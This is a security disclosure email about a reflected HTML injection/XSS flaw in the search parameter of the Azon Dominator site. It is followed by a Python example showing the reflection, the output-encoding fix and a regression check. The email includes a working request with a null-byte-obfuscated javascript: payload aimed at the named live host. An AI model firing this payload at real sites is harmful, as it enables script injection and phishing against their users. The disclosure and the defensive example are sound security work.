Hi There,

Azon Dominator is vulnerable to an HTML Injection vulnerability in its search functionality. The issue arises due to insufficient input validation in the q parameter, allowing an attacker to inject arbitrary HTML elements. This could lead to potential security risks such as content manipulation or phishing attacks.

Source URL: https://azon-dominator.webister.net/
Source Name: Seyfullah Kılıç
Software URL: https://azon-dominator.webister.net/

*Proof of Concept (PoC):*

Vulnerable Endpoint:
URL: https://azon-dominator.webister.net/searchurl?q=
Method: GET
Parameter Affected: q
Vulnerability Type: Reflected XSS / HTML Injection

*Payload Example:*
test

*Request Example:*
GET /search?q=%3Ca%20href=%22javas\x00cript:javascript:alert(1)%22%20id=%22fuzzelement1%22%3Etest%3C/a%3E HTTP/2
Host: azon-dominator.webister.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

This vulnerability allows an attacker to inject arbitrary HTML content into the search query, potentially leading to security risks such as content spoofing or malicious script injection.

Regards.

--
*Seyfullah KILIÇ*
*CEO - Founder*
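
The reflection described in this report and the output encoding that closes it, as an added example that is not part of the original message or the product's code. The request target is the one quoted in the report; the templates (`render_vulnerable`, `render_hardened`) and the helper names are hypothetical, since the application's source is not on the page.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Request target quoted in the report above, unchanged.
REQUEST_TARGET = (r"/search?q=%3Ca%20href=%22javas\x00cript:javascript:alert(1)%22"
                  "%20id=%22fuzzelement1%22%3Etest%3C/a%3E")

def query_value(target, name="q"):
    """Decode one query parameter the way a web framework would."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return values.get(name, [""])[0]

def render_vulnerable(q):
    # Constructed template (assumption): raw concatenation, as the report describes.
    return "<h1>Results for " + q + "</h1>"

def render_hardened(q):
    # Encode &, <, >, " and ' so the value stays text in element and attribute context.
    return "<h1>Results for " + escape(q, quote=True) + "</h1>"

class TagCollector(HTMLParser):
    """Records start tags and text as an HTML parser sees the response."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.text = [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))
    def handle_data(self, data):
        self.text.append(data)

def parsed(page):
    """Return (start tags with attributes, concatenated visible text)."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags, "".join(collector.text)

def injected_tags(page, allowed=("h1",)):
    """Regression check: tags in the response that the template did not emit."""
    return [t for t in parsed(page)[0] if t[0] not in allowed]

if __name__ == "__main__":
    q = query_value(REQUEST_TARGET)
    print(injected_tags(render_vulnerable(q)))
    print(injected_tags(render_hardened(q)))
```

The `injected_tags` check can be kept as a regression test against the search template so that a later change that drops the encoding is caught before release.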